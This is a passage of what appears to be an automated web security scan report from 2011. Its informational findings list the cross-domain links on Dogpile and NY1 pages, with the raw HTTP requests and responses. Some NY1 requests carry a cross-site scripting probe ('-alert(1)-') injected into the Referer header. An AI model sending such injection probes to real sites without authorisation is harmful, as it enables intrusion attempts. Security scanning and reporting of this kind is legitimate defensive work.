<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
</script>
<a id="icePage_FavoriteFetchesAd_QuickStartAddThis_AddThisLink" onclick="logClick(callback_server_url);return addthis_open(this, '', addthis_share_url , document.title)" href="http://www.addthis.com/bookmark.php?v=20">Bookmark and Share</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<div>
<img width="710" height="292" border="0" usemap="#aprilfools" src="http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif">
<map name="aprilfools">
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.60. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.addthis.com/bookmark.php?v=20
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=ad4f7a783cad434894d0c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:04 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:04 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:04 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:03 GMT
Connection: close
Content-Length: 31769
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DocumentStyleBase_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true" />



<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
</script>
<a id="icePage_FavoriteFetchesAd_QuickStartAddThis_AddThisLink" onclick="logClick(callback_server_url);return addthis_open(this, '', addthis_share_url , document.title)" href="http://www.addthis.com/bookmark.php?v=20">Bookmark and Share</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<div>
<img width="710" height="292" border="0" usemap="#aprilfools" src="http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif">
<map name="aprilfools">
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...

11.61. http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://s7.addthis.com/js/200/addthis_widget.js
http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.addthis.com/bookmark.php?v=20
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=07b62dd01abe4a40ae4ac16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:00 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:00 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:00 GMT
Connection: close
Content-Length: 32398
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DocumentStyleBase_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/dp-index.css/_iceUrlFlag=15?_IceUrl=true" />



<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/home_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
</script>
<a id="icePage_FavoriteFetchesAd_QuickStartAddThis_AddThisLink" onclick="logClick(callback_server_url);return addthis_open(this, '', addthis_share_url , document.title)" href="http://www.addthis.com/bookmark.php?v=20">Bookmark and Share</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<div>
<img width="710" height="292" border="0" usemap="#aprilfools" src="http://ttl30d.images.infospace.com.edgesuite.net/search/images/201103/Arfie_AprilFools2.gif">
<map name="aprilfools">
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...

11.62. http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 16:59:48 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=01b1f546d0d24c42a95cc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:48 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:48 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:59:48 GMT
Connection: close
Content-Length: 50929
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content=" save searches, adult filter, languages"/>

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_rss/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.63. http://www.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.ny1.com/Content/ServeContent.aspx?id=691&ticks=954793

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/twc.ny1/topstories-allboroughs;pos=top;twc=ad;tile=4;sz=160x600;ord=123456789?
http://ad.doubleclick.net/jump/twc.ny1/topstories-allboroughs;pos=top;twc=ad;tile=4;sz=160x600;ord=123456789?

Request

GET /Content/ServeContent.aspx?id=691&ticks=954793 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 1091
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:10:33 GMT
Date: Fri, 01 Apr 2011 18:10:33 GMT
Connection: close

<div id="08dd1484-796a-4bdc-b46f-7af5ae241c58">

<script language="JavaScript" type="text/javascript">
if (typeof ord=='undefined') {ord=Math.
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/twc.ny1/topstories-allboroughs;pos=top;twc=ad;tile=4;sz=160x600;ord=123456789?" target="_blank">
<img src="http://ad.doubleclick.net/ad/twc.ny1/topstories-allboroughs;pos=top;twc=ad;tile=4;sz=160x600;ord=123456789?" width="160" height="600" border="0" alt="">
</a>
...[SNIP]...

11.64. http://www.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.ny1.com/Content/ServeContent.aspx?id=694&ticks=810228

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/twc.ny1/topstories-allboroughs;pos=top;twc=ad;tile=4;sz=728x90;ord=123456789?
http://ad.doubleclick.net/jump/twc.ny1/topstories-allboroughs;pos=top;twc=ad;tile=4;sz=728x90;ord=123456789?

Request

GET /Content/ServeContent.aspx?id=694&ticks=810228 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 1086
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:10:25 GMT
Date: Fri, 01 Apr 2011 18:10:25 GMT
Connection: close

<div id="8f2b093d-2ef1-4397-927f-8e726bf78371">

<script language="JavaScript" type="text/javascript">
if (typeof ord=='undefined') {ord=Math.r
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/twc.ny1/topstories-allboroughs;pos=top;twc=ad;tile=4;sz=728x90;ord=123456789?" target="_blank">
<img src="http://ad.doubleclick.net/ad/twc.ny1/topstories-allboroughs;pos=top;twc=ad;tile=4;sz=728x90;ord=123456789?" width="728" height="90" border="0" alt="">
</a>
...[SNIP]...

11.65. http://www.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.ny1.com/Content/ServeContent.aspx?id=693&ticks=73882

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/twc.ny1/topstories-allboroughs;pos=top;twc=ad;tile=4;sz=300x250;ord=123456789?
